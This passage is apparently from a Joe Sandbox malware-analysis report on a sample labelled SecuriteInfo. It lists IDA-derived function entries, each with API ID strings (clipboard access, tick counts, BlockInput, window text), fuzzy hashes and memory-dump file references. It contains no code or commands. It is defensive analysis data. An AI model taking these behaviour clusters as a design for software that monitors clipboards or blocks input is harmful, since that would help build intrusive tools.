                            • Opcode Fuzzy Hash: fcea701a1957fe7c7010537808d3662c79a156260bb55be193bce92fc611b973
                            • Instruction Fuzzy Hash: 90B14D32605B4486FB6BCB27E8847EA77A1F74DBD4F540116EB9947AB9DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 4107439908-0
                            • Opcode ID: eceef102e2ca60857718fac67bce977996b07f4fbd745a187c864f40c563aa4e
                            • Instruction ID: 9872727d16a03451064848ceb9ca5c6d58e50eaaaf82b6aed878ceef501e29ae
                            • Opcode Fuzzy Hash: eceef102e2ca60857718fac67bce977996b07f4fbd745a187c864f40c563aa4e
                            • Instruction Fuzzy Hash: F3A15D72205B4486FB6BCB27E8847EA67A1F74DBD4F540116EB5A47AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseFileGlobalMessageMovePeekUnlock
                            • String ID:
                            • API String ID: 1818255640-0
                            • Opcode ID: a6cbc0eff7417ac01470f089435bda35d8cb5ab2894254fcb0973e824d035bcf
                            • Instruction ID: e23ce32d42853de8d197fab344af6d4f882fbea69d67ea34d8bba0c7916b609b
                            • Opcode Fuzzy Hash: a6cbc0eff7417ac01470f089435bda35d8cb5ab2894254fcb0973e824d035bcf
                            • Instruction Fuzzy Hash: 5CA16F32205B4086FB6B8B27E8847EA27A1F74DBE4F544116FB5987AF5DB38C881C741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$BeepClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 3141429382-0
                            • Opcode ID: dd3dde60f13e2d7f02c71776e28cf44a38452c7338ed441e844b31b158028cd0
                            • Instruction ID: 7a429a65e8c7923891d787b0ede226120a73609ed7bce8550b8ab0b42f6debdf
                            • Opcode Fuzzy Hash: dd3dde60f13e2d7f02c71776e28cf44a38452c7338ed441e844b31b158028cd0
                            • Instruction Fuzzy Hash: F2918032604B4486FB6B8B27E8447EA77A1F74DBE4F540116EB5A87AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTickWindow$ClipboardCloseForegroundGlobalMessagePeekTextUnlockVisible
                            • String ID:
                            • API String ID: 1043259673-0
                            • Opcode ID: 3561a395f7453b6d922c336265d213d02a22f6ec6122ff7eeed711209a91dd92
                            • Instruction ID: 03e9f91fc1672be58f95bce4c5fc7039c38299a630fdfda19ae346819bd403f0
                            • Opcode Fuzzy Hash: 3561a395f7453b6d922c336265d213d02a22f6ec6122ff7eeed711209a91dd92
                            • Instruction Fuzzy Hash: DC917D32205B4486FB6B8B27E8847EA77A2F74DBE4F140116EB5947AF5DB38D881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseEmptyGlobalMessagePeekRecycleUnlock
                            • String ID:
                            • API String ID: 2387848762-0
                            • Opcode ID: 33f3d304712845c1afa68b130bfebb76fe99d664ecd808039b146d3cf4242a3f
                            • Instruction ID: 81d55c210eddb6dc3b25a59dd37d364ca035143a1b128d75b07052d20816b024
                            • Opcode Fuzzy Hash: 33f3d304712845c1afa68b130bfebb76fe99d664ecd808039b146d3cf4242a3f
                            • Instruction Fuzzy Hash: 6D917132605B4086FB6B8B27E8847EA77A1F74DBE4F544116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ErrorLast$AttributesClipboardCloseFileFullGlobalMessageNamePathPeekUnlock
                            • String ID:
                            • API String ID: 769837341-0
                            • Opcode ID: 50cc4f34daf5e6e3b58d34c94f2aead68375eb41bb3ea415367a90325a519d6d
                            • Instruction ID: 5016a245d3c179cf9ffcef6440128dc0a908d34a65de18e198cda55f051d710b
                            • Opcode Fuzzy Hash: 50cc4f34daf5e6e3b58d34c94f2aead68375eb41bb3ea415367a90325a519d6d
                            • Instruction Fuzzy Hash: 63915132205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB59876F5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseEnvironmentGlobalMessagePeekUnlockVariable
                            • String ID:
                            • API String ID: 2791281230-0
                            • Opcode ID: c8ee9ecd6d6ac5a57429e8b7c7c20779b43bace1391c25cb45e5b660dafee915
                            • Instruction ID: 50cdd63b04a12da761e673d40b121f40a12708a817ddb71bb5dbcbeb2cf54574
                            • Opcode Fuzzy Hash: c8ee9ecd6d6ac5a57429e8b7c7c20779b43bace1391c25cb45e5b660dafee915
                            • Instruction Fuzzy Hash: 85916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
                            • String ID:
                            • API String ID: 3677732381-0
                            • Opcode ID: e64a08d68ada1e383ff7dfe411c7496ea38f033e45399501c4a8ebe04c7ba7bb
                            • Instruction ID: 8c74c506dbfb04a2761e5ed3627728f1f00c9e1b6fcaa5f7a0226c373d782455
                            • Opcode Fuzzy Hash: e64a08d68ada1e383ff7dfe411c7496ea38f033e45399501c4a8ebe04c7ba7bb
                            • Instruction Fuzzy Hash: E2818132205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5A47AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
                            • String ID:
                            • API String ID: 3677732381-0
                            • Opcode ID: 098493fa739c6f1c6ce57146dafbbe3b7a12a3d02d133607d96dbf6f445f31f0
                            • Instruction ID: babbc73a52a3977578806980d8ddcc74465ac63fef842476d766d94011948813
                            • Opcode Fuzzy Hash: 098493fa739c6f1c6ce57146dafbbe3b7a12a3d02d133607d96dbf6f445f31f0
                            • Instruction Fuzzy Hash: AB818232205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5947AF5CB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseDebugGlobalMessageOutputPeekStringUnlock
                            • String ID:
                            • API String ID: 1875564215-0
                            • Opcode ID: 74dc71ebc4e63f97b1d0fe555a874af1444d90fb201e9d7649cbeffe7282d3c0
                            • Instruction ID: 98cb3ab9328de7d70abe5b8ba7503a063b84ddbba0e4910451a98d462fa5416c
                            • Opcode Fuzzy Hash: 74dc71ebc4e63f97b1d0fe555a874af1444d90fb201e9d7649cbeffe7282d3c0
                            • Instruction Fuzzy Hash: 11817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Count$ClipboardTick$AvailableFormat$FormatsMessage
                            • String ID:
                            • API String ID: 3556998310-0
                            • Opcode ID: ed7b69d913f97db6b630eb19b08abd11ed7f0658a162ffe8a2d595de231ab655
                            • Instruction ID: ce760f6fcd84c781c025144108fd4be7885210cc41408ea2898013a3221c4e88
                            • Opcode Fuzzy Hash: ed7b69d913f97db6b630eb19b08abd11ed7f0658a162ffe8a2d595de231ab655
                            • Instruction Fuzzy Hash: 5D716C72204A808AFB67CF27F8407E937A5F78CB98F544129EB4A5B6B5DB34C881C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Messagefree
                            • String ID: call
                            • API String ID: 3699376206-3431870270
                            • Opcode ID: 593eaa5b835cb017b1a2ca537513666172a2d7c725d4e00bf6f9924eda71177f
                            • Instruction ID: 73d795f549d9ba6ce4d787e275223675034a792e880d6a287fdd2592e22c6698
                            • Opcode Fuzzy Hash: 593eaa5b835cb017b1a2ca537513666172a2d7c725d4e00bf6f9924eda71177f
                            • Instruction Fuzzy Hash: E77183B2104B809AE766CF26F8447E977A5F78CB98F544126FB4947AB5DB34C541CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: __doserrno_errno
                            • String ID:
                            • API String ID: 921712934-0
                            • Opcode ID: e2a816f3bda0864b16cb19fa9a83befb4879e065206f3371bbcaaada9374db41
                            • Instruction ID: 5974b3b25d236b1efca06bae42c7a38c9b8969bac27403bfb6f7edfc5baef6fc
                            • Opcode Fuzzy Hash: e2a816f3bda0864b16cb19fa9a83befb4879e065206f3371bbcaaada9374db41
                            • Instruction Fuzzy Hash: 3C21F03271468086F62B6F27E8413FE7660AB8CBE1F494105BF150B3F2DBBC88428761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$ClassCurrentDialogDirectoryForegroundMessageNameProcessThread
                            • String ID: #32770
                            • API String ID: 2633243691-463685578
                            • Opcode ID: 55a5f12f70680434cd9c6846416b2dbd8e8b0409ab07550086e69759ef738f17
                            • Instruction ID: 13e62cd1402b08ae7e1b290a156aad89562d73791a2084b2b46bcb8e2a0d146a
                            • Opcode Fuzzy Hash: 55a5f12f70680434cd9c6846416b2dbd8e8b0409ab07550086e69759ef738f17
                            • Instruction Fuzzy Hash: B13139B1205B8586FF67CB17E8543E427A0A74DBD4F180026EB0A2B7B4DF78D986C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 8d74a98857db42192ab5d809668da4fa8fa1c9cc8c9bfb5057f4bdf62ed694d8
                            • Instruction ID: 2098af272220fe9a817936dc927d8e5afffd6d4322b5c26a69d94b7877b1a529
                            • Opcode Fuzzy Hash: 8d74a98857db42192ab5d809668da4fa8fa1c9cc8c9bfb5057f4bdf62ed694d8
                            • Instruction Fuzzy Hash: 33E19E32604B8089E767CB26E8447EA37A5F74DBE4F154216EF8947BB4DB38C981C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountDragFinishTick
                            • String ID:
                            • API String ID: 1673030553-0
                            • Opcode ID: dced1849271494bcbad8b6b02a4794bb067002d3a2bda61d2e9b8c38b6d98c32
                            • Instruction ID: 73c39381ea34a135986d6729d1cf4b2b86e875d2fddc847d707355d7fa03974d
                            • Opcode Fuzzy Hash: dced1849271494bcbad8b6b02a4794bb067002d3a2bda61d2e9b8c38b6d98c32
                            • Instruction Fuzzy Hash: 64D17BB2205A818AFB67CB27B9543EA37A5F34DBD4F144226EB5A076F5CB34C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
